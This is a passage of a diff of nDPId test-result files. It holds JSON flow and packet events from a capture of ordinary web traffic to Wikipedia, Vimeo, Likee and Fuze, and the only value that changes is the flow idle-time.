+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223595999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595999,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfP1bxq7QwKgBgAG7xbxrNtsg2iAXCKASqbDzDgAAAgQFnAQCCAoXn7wwvOpO1QEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223596002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623223596002,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0ZBlAAEAGCezAqAGAW8au0MW8AbvaIBcIazbbIYAQAfbJTQAAAQEICrzqTwcXn7ww"} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223595952,"flow_last_seen":1623223596004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623223596004,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623223595952,"flow_last_seen":1623223596052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623223596052,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":107,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623222051753,"flow_last_seen":1623222112185,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8780,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1623223596203,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":119,"packets-processed":118,"total-skipped-flows":0,"total-l4-data-len":35609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":5,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1623226283573} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226283573,"flow_last_seen":1623226283573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226283573,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623226283573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623226283573,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8M5RAAEAGJgDAqAH6LVLxM5vSAFAXgCu+AAAAAKAC\/\/9tawAAAgQFtAQCCAolvfRMAAAAAAEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623226283601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623226283601,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA0AABAADMGZpwtUvEzwKgB+gBQm9LNImc9F4Arv4ASchAIQAAAAgQFeAEBBAIBAwMK"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623226283602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623226283602,"pkt":"pJGxgjQ5AoEfHBPlCABFAAAoM5VAAEAGJhPAqAH6LVLxM5vSAFAXgCu\/zSJnPlAQAKy6PQAAAAAAAAAA"} -00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226283573,"flow_last_seen":1623226283612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1623226283612,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"videosnap.like.video","url":"videosnap.like.video\/eu_live\/5uz\/1YOmxT.webp?type=8&resize=1&dw=360","code":0,"content_type":"","user_agent":"Like-Android"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":229,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1623223595952,"flow_last_seen":1623223766553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17734,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1623226286427,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226283573,"flow_last_seen":1623226283573,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226283573,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623226283573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623226283573,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8M5RAAEAGJgDAqAH6LVLxM5vSAFAXgCu+AAAAAKAC\/\/9tawAAAgQFtAQCCAolvfRMAAAAAAEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623226283601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623226283601,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA0AABAADMGZpwtUvEzwKgB+gBQm9LNImc9F4Arv4ASchAIQAAAAgQFeAEBBAIBAwMK"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623226283602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623226283602,"pkt":"pJGxgjQ5AoEfHBPlCABFAAAoM5VAAEAGJhPAqAH6LVLxM5vSAFAXgCu\/zSJnPlAQAKy6PQAAAAAAAAAA"} +00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226283573,"flow_last_seen":1623226283612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1623226283612,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"videosnap.like.video","url":"videosnap.like.video\/eu_live\/5uz\/1YOmxT.webp?type=8&resize=1&dw=360","code":0,"content_type":"","user_agent":"Like-Android"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":229,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1623223595952,"flow_last_seen":1623223766553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17734,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1623226286427,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":231,"packets-processed":230,"total-skipped-flows":0,"total-l4-data-len":108050,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":5,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":41,"global_ts_msec":1631088115362} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631088115362,"flow_last_seen":1631088115362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631088115362,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1631088115362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115362,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8aylAAEAG8xTAqAGAx+hSbbaEAbsR7WhdAAAAAKAC+vCzrwAAAgQFtAQCCAqzLdcpAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1631088115376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADQGaj7H6FJtwKgBgAG7toQ\/rdv6Ee1oXqAS\/\/\/HZwAAAgQFTAQCCApg6mr7sy3XKQEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1631088115376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631088115376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0aypAAEAG8xvAqAGAx+hSbbaEAbsR7WheP63b+4AQAfbzyQAAAQEICrMt1zdg6mr7"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631088115362,"flow_last_seen":1631088115376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631088115376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1861,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":4549,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","server_names":"*.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.vimeocdn.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:0F:CF:EC:3C:13:25:E2:E1:4D:C6:52:A6:4D:8D:96:10:1E:8E:37"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":248,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1623226283573,"flow_last_seen":1623226466507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":72441,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1631088115406,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631088115362,"flow_last_seen":1631088115362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631088115362,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1631088115362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115362,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8aylAAEAG8xTAqAGAx+hSbbaEAbsR7WhdAAAAAKAC+vCzrwAAAgQFtAQCCAqzLdcpAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1631088115376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADQGaj7H6FJtwKgBgAG7toQ\/rdv6Ee1oXqAS\/\/\/HZwAAAgQFTAQCCApg6mr7sy3XKQEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1631088115376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631088115376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0aypAAEAG8xvAqAGAx+hSbbaEAbsR7WheP63b+4AQAfbzyQAAAQEICrMt1zdg6mr7"} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631088115362,"flow_last_seen":1631088115376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631088115376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1861,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":4549,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","server_names":"*.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.vimeocdn.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:0F:CF:EC:3C:13:25:E2:E1:4D:C6:52:A6:4D:8D:96:10:1E:8E:37"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":248,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1623226283573,"flow_last_seen":1623226466507,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":72441,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1631088115406,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":256,"packets-processed":255,"total-skipped-flows":0,"total-l4-data-len":113664,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":7,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":50,"global_ts_msec":1637349011376} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637349011376,"flow_last_seen":1637349011376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637349011376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1637349011376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TGJAAEAGkyTAqAGAj8wJQb8WAbs5hVBVAAAAAKAC+vA+\/wAAAgQFtAQCCAoHfmCrAAAAAAEDAww="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1637349011393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011393,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8T5MAAPMGHPOPzAlBwKgBgAG7vxa2dgKJOYVQVqASBZSQpgAAAgQFoAQCCArIQyJ4B35gqwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1637349011393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637349011393,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0TGNAAEAGkyvAqAGAj8wJQb8WAbs5hVBWtnYCioAQABDE0gAAAQEICgd+YL3IQyJ4"} 